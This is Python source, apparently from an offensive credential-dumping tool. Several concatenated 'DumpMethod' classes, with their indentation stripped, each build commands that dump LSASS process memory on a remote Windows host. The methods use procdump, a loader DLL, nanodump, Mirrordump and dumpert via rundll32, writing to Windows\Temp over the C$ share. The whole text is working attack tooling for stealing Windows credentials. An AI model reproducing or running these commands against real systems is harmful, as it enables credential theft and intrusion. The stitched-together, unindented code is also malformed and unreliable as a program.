class DumpMethod(IDumpMethod):
custom_dump_ext_support = False
dump_ext = "dmp"
def __init__(self, session, timeout):
super().__init__(session, timeout)
self.procdump = Dependency("procdump", "procdump.exe")
def prepare(self, options):
return self.prepare_dependencies(options, [self.procdump])
def clean(self):
self.clean_dependencies([self.procdump])
def get_commands(self, dump_path=None, dump_name=None, no_powershell=False):
cmd_command = """for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do {} -accepteula -o -ma %J {}{}""".format(
self.procdump.get_remote_path(),
self.dump_path, self.dump_name
)
pwsh_command = """{} -accepteula -o -ma (Get-Process lsass).Id {}{}""".format(
self.procdump.get_remote_path(),
self.dump_path, self.dump_name
)
return {
"cmd": cmd_command,
"pwsh": pwsh_command
}
class DumpMethod(IDumpMethod):
custom_dump_path_support = False
custom_dump_name_support = False
dump_name = "tmp.dmp"
dump_share = "C$"
dump_path = "\\Windows\\Temp\\"
def __init__(self, session, timeout):
super().__init__(session, timeout)
self.loader = Dependency("loader", "loader.exe")
self.dll = Dependency("dll", "calc.dll")
def prepare(self, options):
return self.prepare_dependencies(options, [self.loader, self.dll])
def clean(self):
self.clean_dependencies([self.loader, self.dll])
def get_commands(self, dump_path=None, dump_name=None, no_powershell=False):
cmd_command = """for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do {} %J""".format(
self.loader.get_remote_path()
)
pwsh_command = """{}{} (Get-Process lsass).Id""".format(
self.loader.remote_path, self.loader.file
)
return {
"cmd": cmd_command,
"pwsh": pwsh_command
}
class DumpMethod(IDumpMethod):
def __init__(self, session, timeout):
super().__init__(session, timeout)
self.nanodump = Dependency("nanodump", "nanodump.exe")
def prepare(self, options):
return self.prepare_dependencies(options, [self.nanodump])
def clean(self):
self.clean_dependencies([self.nanodump])
def get_commands(self,
dump_path=None,
dump_name=None,
no_powershell=False):
cmd_command = """{} -v --write C:\\{}{}""".format(
self.nanodump.get_remote_path(), self.dump_path, self.dump_name)
return {"cmd": cmd_command, "pwsh": cmd_command}
class DumpMethod(IDumpMethod):
def __init__(self, session, timeout):
super().__init__(session, timeout)
self.mirrordump = Dependency("mirrordump", "Mirrordump.exe")
def prepare(self, options):
return self.prepare_dependencies(options, [self.mirrordump])
def clean(self):
self.clean_dependencies([self.mirrordump])
def get_commands(self, dump_path=None, dump_name=None, no_powershell=False):
cmd_command = """{} -f {}{} -d {}""".format(
self.mirrordump.get_remote_path(),
self.dump_path, self.dump_name,
''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8)) + ".dll"
)
return {
"cmd": cmd_command,
"pwsh": cmd_command
}
class DumpMethod(IDumpMethod):
custom_dump_path_support = False
custom_dump_name_support = False
dump_name = "dumpert.dmp"
dump_share = "C$"
dump_path = "\\Windows\\Temp\\"
def __init__(self, session, timeout):
super().__init__(session, timeout)
self.dumpertdll = Dependency("dumpertdll", "dumpert.dll")
def prepare(self, options):
return self.prepare_dependencies(options, [self.dumpertdll])
def clean(self):
self.clean_dependencies([self.dumpertdll])
def get_commands(self):
cmd_command = """rundll32.exe {},Dump""".format(
self.dumpertdll.get_remote_path())
pwsh_command = cmd_command
return {"cmd": cmd_command, "pwsh": pwsh_command}